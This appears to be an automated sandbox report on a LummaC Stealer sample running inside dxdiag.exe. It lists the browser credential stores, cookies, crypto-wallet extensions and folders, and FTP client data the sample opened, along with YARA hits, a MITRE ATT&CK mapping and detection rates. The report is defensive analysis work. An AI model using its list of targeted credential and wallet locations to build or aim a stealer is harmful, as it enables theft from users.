Source: C:\Windows\SysWOW64\dxdiag.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: dxdiag.exe, 00000006.00000003.2274430928.0000000002982000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2274400610.000000000297C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\SysWOW64\dxdiag.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: dxdiag.exe PID: 1708, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: dxdiag.exe, 00000006.00000003.2258750277.0000000002988000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: dxdiag.exe, 00000006.00000003.2258750277.0000000002988000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: dxdiag.exe, 00000006.00000003.2258810480.000000000297A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: dxdiag.exe, 00000006.00000003.2295268267.0000000002981000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: pdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""],"z":"Wallets/Le
Source: dxdiag.exe, 00000006.00000003.2295268267.0000000002981000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: pdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""],"z":"Wallets/Le
Source: dxdiag.exe, 00000006.00000003.2258810480.000000000297A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: dxdiag.exe, 00000006.00000003.2258810480.000000000297A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior

Source: Yara match

File source: Process Memory Space: dxdiag.exe PID: 1708, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: dxdiag.exe PID: 1708, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	2 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	121 Masquerading	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	11 Peripheral Device Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	24 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
msit.msi	58%	Virustotal		Browse
msit.msi	55%	ReversingLabs	Win64.Spyware.Lummastealer

Dropped Files

Source	Detection	Scanner	Label
